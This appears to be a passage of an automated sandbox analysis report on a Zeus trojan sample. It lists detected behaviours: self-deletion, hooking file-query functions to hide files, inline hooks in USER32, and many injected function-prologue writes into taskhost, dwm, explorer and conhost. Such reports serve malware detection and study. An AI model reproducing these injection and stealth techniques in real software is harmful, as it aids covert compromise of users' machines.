Code function: 0_2_003BEA11 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadImageW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,

0_2_003BEA11

Deletes itself after installation

Show sources

Source: C:\Windows\System32\cmd.exe

File deleted: c:\zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Hooks files or directories query functions (used to hide files and directories)

Show sources

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: GetFileAttributesExW

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has chanced: module: USER32.dll function: CallWindowProcA new code: 0xE9 0x9F 0xF8 0x8A 0xA4 0x4B

Overwrites code with function prologues

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E000A value: 8B FF 55 8B EC E9 A6 F5 DA 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E0014 value: 8B FF 55 8B EC E9 34 5F 87 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E001E value: 8B FF 55 8B EC E9 90 EE A1 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E0028 value: 8B FF 55 8B EC E9 47 05 A9 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E0032 value: 8B FF 55 8B EC E9 0D 8E A3 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E003C value: 8B FF 55 8B EC E9 4D 04 A9 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E0046 value: 8B FF 55 8B EC E9 F3 C7 A1 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E0050 value: 8B FF 55 8B EC E9 0F E2 A1 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E005A value: 8B FF 55 8B EC E9 BA 12 A4 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E0064 value: 8B FF 55 8B EC E9 62 41 A2 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E006E value: 8B FF 55 8B EC E9 4F CB A1 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E0078 value: 8B FF 55 8B EC E9 70 3B F4 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E0082 value: 8B FF 55 8B EC E9 41 C4 F4 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E008C value: 8B FF 55 8B EC E9 16 68 F4 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E00A0 value: 8B FF 55 8B EC E9 48 17 BD 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E00C2 value: 8B FF 55 8B EC E9 92 BA BD 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E00CC value: 8B FF 55 8B EC E9 06 90 BF 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E00D6 value: 8B FF 55 8B EC E9 F1 3B C0 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E00E0 value: 8B FF 55 8B EC E9 B6 3D C0 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E00EA value: 8B FF 55 8B EC E9 8B 3A C0 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E00F4 value: 8B FF 55 8B EC E9 40 33 C0 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E00FE value: 8B FF 55 8B EC E9 D7 42 BE 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E0108 value: 8B FF 55 8B EC E9 D1 40 C0 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E0112 value: 8B FF 55 8B EC E9 04 27 BE 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E011C value: 8B FF 55 8B EC E9 04 E1 BD 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E0126 value: 8B FF 55 8B EC E9 00 20 BE 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E0130 value: 8B FF 55 8B EC E9 C3 5F BD 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E016C value: 8B FF 55 8B EC E9 E4 6E BE 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E0176 value: 8B FF 55 8B EC E9 EA C0 BD 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E0180 value: 8B FF 55 8B EC E9 EF 3E C0 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E0196 value: 8B FF 55 8B EC E9 FD BF BD 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E01A0 value: 8B FF 55 8B EC E9 33 C0 C1 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E01CA value: 8B FF 55 8B EC E9 C8 8D BE 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E01D4 value: 8B FF 55 8B EC E9 96 26 BE 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E01DE value: 8B FF 55 8B EC E9 D2 8F BE 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E01E8 value: 8B FF 55 8B EC E9 C5 2C BE 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E01F2 value: 8B FF 55 8B EC E9 18 8F BE 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E01FC value: 8B FF 55 8B EC E9 46 49 BF 76
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: PID: 3684 base: 3E0206 value: 8B FF 55 8B EC E9 55 0B 02 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 124000A value: 8B FF 55 8B EC E9 A6 F5 F4 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 1240014 value: 8B FF 55 8B EC E9 34 5F A1 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 124001E value: 8B FF 55 8B EC E9 90 EE BB 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 1240028 value: 8B FF 55 8B EC E9 47 05 C3 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 1240032 value: 8B FF 55 8B EC E9 0D 8E BD 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 124003C value: 8B FF 55 8B EC E9 4D 04 C3 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 1240046 value: 8B FF 55 8B EC E9 F3 C7 BB 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 1240050 value: 8B FF 55 8B EC E9 0F E2 BB 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 124005A value: 8B FF 55 8B EC E9 BA 12 BE 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 1240064 value: 8B FF 55 8B EC E9 62 41 BC 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 124006E value: 8B FF 55 8B EC E9 4F CB BB 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 1240078 value: 8B FF 55 8B EC E9 70 3B 0E 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 1240082 value: 8B FF 55 8B EC E9 41 C4 0E 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 124008C value: 8B FF 55 8B EC E9 16 68 0E 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 12400A0 value: 8B FF 55 8B EC E9 48 17 D7 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 12400C2 value: 8B FF 55 8B EC E9 92 BA D7 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 12400CC value: 8B FF 55 8B EC E9 06 90 D9 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 12400D6 value: 8B FF 55 8B EC E9 F1 3B DA 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 12400E0 value: 8B FF 55 8B EC E9 B6 3D DA 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 12400EA value: 8B FF 55 8B EC E9 8B 3A DA 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 12400F4 value: 8B FF 55 8B EC E9 40 33 DA 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 12400FE value: 8B FF 55 8B EC E9 D7 42 D8 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 1240108 value: 8B FF 55 8B EC E9 D1 40 DA 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 1240112 value: 8B FF 55 8B EC E9 04 27 D8 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 124011C value: 8B FF 55 8B EC E9 04 E1 D7 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 1240126 value: 8B FF 55 8B EC E9 00 20 D8 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 1240130 value: 8B FF 55 8B EC E9 C3 5F D7 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 124016C value: 8B FF 55 8B EC E9 E4 6E D8 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 1240176 value: 8B FF 55 8B EC E9 EA C0 D7 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 1240180 value: 8B FF 55 8B EC E9 EF 3E DA 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 1240196 value: 8B FF 55 8B EC E9 FD BF D7 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 12401A0 value: 8B FF 55 8B EC E9 33 C0 DB 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 12401CA value: 8B FF 55 8B EC E9 C8 8D D8 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 12401D4 value: 8B FF 55 8B EC E9 96 26 D8 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 12401DE value: 8B FF 55 8B EC E9 D2 8F D8 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 12401E8 value: 8B FF 55 8B EC E9 C5 2C D8 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 12401F2 value: 8B FF 55 8B EC E9 18 8F D8 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 12401FC value: 8B FF 55 8B EC E9 46 49 D9 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1292 base: 1240206 value: 8B FF 55 8B EC E9 55 0B 1C 74
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A000A value: 8B FF 55 8B EC E9 A6 F5 AE 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A0014 value: 8B FF 55 8B EC E9 34 5F 5B 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A001E value: 8B FF 55 8B EC E9 90 EE 75 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A0028 value: 8B FF 55 8B EC E9 47 05 7D 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A0032 value: 8B FF 55 8B EC E9 0D 8E 77 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A003C value: 8B FF 55 8B EC E9 4D 04 7D 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A0046 value: 8B FF 55 8B EC E9 F3 C7 75 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A0050 value: 8B FF 55 8B EC E9 0F E2 75 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A005A value: 8B FF 55 8B EC E9 BA 12 78 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A0064 value: 8B FF 55 8B EC E9 62 41 76 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A006E value: 8B FF 55 8B EC E9 4F CB 75 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A0078 value: 8B FF 55 8B EC E9 70 3B C8 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A0082 value: 8B FF 55 8B EC E9 41 C4 C8 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A008C value: 8B FF 55 8B EC E9 16 68 C8 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A00A0 value: 8B FF 55 8B EC E9 48 17 91 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A00C2 value: 8B FF 55 8B EC E9 92 BA 91 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A00CC value: 8B FF 55 8B EC E9 06 90 93 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A00D6 value: 8B FF 55 8B EC E9 F1 3B 94 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A00E0 value: 8B FF 55 8B EC E9 B6 3D 94 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A00EA value: 8B FF 55 8B EC E9 8B 3A 94 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A00F4 value: 8B FF 55 8B EC E9 40 33 94 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A00FE value: 8B FF 55 8B EC E9 D7 42 92 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A0108 value: 8B FF 55 8B EC E9 D1 40 94 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A0112 value: 8B FF 55 8B EC E9 04 27 92 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A011C value: 8B FF 55 8B EC E9 04 E1 91 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A0126 value: 8B FF 55 8B EC E9 00 20 92 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A0130 value: 8B FF 55 8B EC E9 C3 5F 91 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A016C value: 8B FF 55 8B EC E9 E4 6E 92 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A0176 value: 8B FF 55 8B EC E9 EA C0 91 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A0180 value: 8B FF 55 8B EC E9 EF 3E 94 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A0196 value: 8B FF 55 8B EC E9 FD BF 91 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A01A0 value: 8B FF 55 8B EC E9 33 C0 95 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A01CA value: 8B FF 55 8B EC E9 C8 8D 92 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A01D4 value: 8B FF 55 8B EC E9 96 26 92 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A01DE value: 8B FF 55 8B EC E9 D2 8F 92 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A01E8 value: 8B FF 55 8B EC E9 C5 2C 92 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A01F2 value: 8B FF 55 8B EC E9 18 8F 92 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A01FC value: 8B FF 55 8B EC E9 46 49 93 76
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 2020 base: 6A0206 value: 8B FF 55 8B EC E9 55 0B D6 74
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B8000A value: 8B FF 55 8B EC E9 A6 F5 60 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B80014 value: 8B FF 55 8B EC E9 34 5F 0D 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B8001E value: 8B FF 55 8B EC E9 90 EE 27 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B80028 value: 8B FF 55 8B EC E9 47 05 2F 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B80032 value: 8B FF 55 8B EC E9 0D 8E 29 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B8003C value: 8B FF 55 8B EC E9 4D 04 2F 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B80046 value: 8B FF 55 8B EC E9 F3 C7 27 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B80050 value: 8B FF 55 8B EC E9 0F E2 27 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B8005A value: 8B FF 55 8B EC E9 BA 12 2A 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B80064 value: 8B FF 55 8B EC E9 62 41 28 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B8006E value: 8B FF 55 8B EC E9 4F CB 27 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B80078 value: 8B FF 55 8B EC E9 70 3B 7A 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B80082 value: 8B FF 55 8B EC E9 41 C4 7A 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B8008C value: 8B FF 55 8B EC E9 16 68 7A 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B800A0 value: 8B FF 55 8B EC E9 48 17 43 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B800C2 value: 8B FF 55 8B EC E9 92 BA 43 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B800CC value: 8B FF 55 8B EC E9 06 90 45 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B800D6 value: 8B FF 55 8B EC E9 F1 3B 46 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B800E0 value: 8B FF 55 8B EC E9 B6 3D 46 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B800EA value: 8B FF 55 8B EC E9 8B 3A 46 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B800F4 value: 8B FF 55 8B EC E9 40 33 46 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B800FE value: 8B FF 55 8B EC E9 D7 42 44 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B80108 value: 8B FF 55 8B EC E9 D1 40 46 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B80112 value: 8B FF 55 8B EC E9 04 27 44 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B8011C value: 8B FF 55 8B EC E9 04 E1 43 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B80126 value: 8B FF 55 8B EC E9 00 20 44 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B80130 value: 8B FF 55 8B EC E9 C3 5F 43 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B8016C value: 8B FF 55 8B EC E9 E4 6E 44 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B80176 value: 8B FF 55 8B EC E9 EA C0 43 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B80180 value: 8B FF 55 8B EC E9 EF 3E 46 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B80196 value: 8B FF 55 8B EC E9 FD BF 43 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B801A0 value: 8B FF 55 8B EC E9 33 C0 47 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B801CA value: 8B FF 55 8B EC E9 C8 8D 44 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B801D4 value: 8B FF 55 8B EC E9 96 26 44 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B801DE value: 8B FF 55 8B EC E9 D2 8F 44 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B801E8 value: 8B FF 55 8B EC E9 C5 2C 44 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B801F2 value: 8B FF 55 8B EC E9 18 8F 44 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B801FC value: 8B FF 55 8B EC E9 46 49 45 75
Source: C:\Windows\explorer.exe	Memory written: PID: 2032 base: 1B80206 value: 8B FF 55 8B EC E9 55 0B 88 73
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E000A value: 8B FF 55 8B EC E9 A6 F5 FA 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E0014 value: 8B FF 55 8B EC E9 34 5F A7 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E001E value: 8B FF 55 8B EC E9 90 EE C1 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E0028 value: 8B FF 55 8B EC E9 47 05 C9 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E0032 value: 8B FF 55 8B EC E9 0D 8E C3 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E003C value: 8B FF 55 8B EC E9 4D 04 C9 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E0046 value: 8B FF 55 8B EC E9 F3 C7 C1 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E0050 value: 8B FF 55 8B EC E9 0F E2 C1 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E005A value: 8B FF 55 8B EC E9 BA 12 C4 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E0064 value: 8B FF 55 8B EC E9 62 41 C2 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E006E value: 8B FF 55 8B EC E9 4F CB C1 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E0078 value: 8B FF 55 8B EC E9 70 3B 14 77
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E0082 value: 8B FF 55 8B EC E9 41 C4 14 77
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E008C value: 8B FF 55 8B EC E9 16 68 14 77
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E00A0 value: 8B FF 55 8B EC E9 48 17 DD 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E00C2 value: 8B FF 55 8B EC E9 92 BA DD 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E00CC value: 8B FF 55 8B EC E9 06 90 DF 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E00D6 value: 8B FF 55 8B EC E9 F1 3B E0 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E00E0 value: 8B FF 55 8B EC E9 B6 3D E0 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E00EA value: 8B FF 55 8B EC E9 8B 3A E0 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E00F4 value: 8B FF 55 8B EC E9 40 33 E0 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E00FE value: 8B FF 55 8B EC E9 D7 42 DE 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E0108 value: 8B FF 55 8B EC E9 D1 40 E0 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E0112 value: 8B FF 55 8B EC E9 04 27 DE 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E011C value: 8B FF 55 8B EC E9 04 E1 DD 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E0126 value: 8B FF 55 8B EC E9 00 20 DE 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E0130 value: 8B FF 55 8B EC E9 C3 5F DD 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E016C value: 8B FF 55 8B EC E9 E4 6E DE 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E0176 value: 8B FF 55 8B EC E9 EA C0 DD 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E0180 value: 8B FF 55 8B EC E9 EF 3E E0 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E0196 value: 8B FF 55 8B EC E9 FD BF DD 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E01A0 value: 8B FF 55 8B EC E9 33 C0 E1 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E01CA value: 8B FF 55 8B EC E9 C8 8D DE 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E01D4 value: 8B FF 55 8B EC E9 96 26 DE 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E01DE value: 8B FF 55 8B EC E9 D2 8F DE 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E01E8 value: 8B FF 55 8B EC E9 C5 2C DE 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E01F2 value: 8B FF 55 8B EC E9 18 8F DE 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E01FC value: 8B FF 55 8B EC E9 46 49 DF 76
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1132 base: 1E0206 value: 8B FF 55 8B EC E9 55 0B 22 75
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 53000A value: 8B FF 55 8B EC E9 A6 F5 C5 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 530014 value: 8B FF 55 8B EC E9 34 5F 72 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 53001E value: 8B FF 55 8B EC E9 90 EE 8C 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 530028 value: 8B FF 55 8B EC E9 47 05 94 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 530032 value: 8B FF 55 8B EC E9 0D 8E 8E 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 53003C value: 8B FF 55 8B EC E9 4D 04 94 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 530046 value: 8B FF 55 8B EC E9 F3 C7 8C 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 530050 value: 8B FF 55 8B EC E9 0F E2 8C 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 53005A value: 8B FF 55 8B EC E9 BA 12 8F 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 530064 value: 8B FF 55 8B EC E9 62 41 8D 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 53006E value: 8B FF 55 8B EC E9 4F CB 8C 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 530078 value: 8B FF 55 8B EC E9 70 3B DF 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 530082 value: 8B FF 55 8B EC E9 41 C4 DF 76
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 540 base: 53008C value: 8B FF 55 8B EC E9 16 68 DF 76
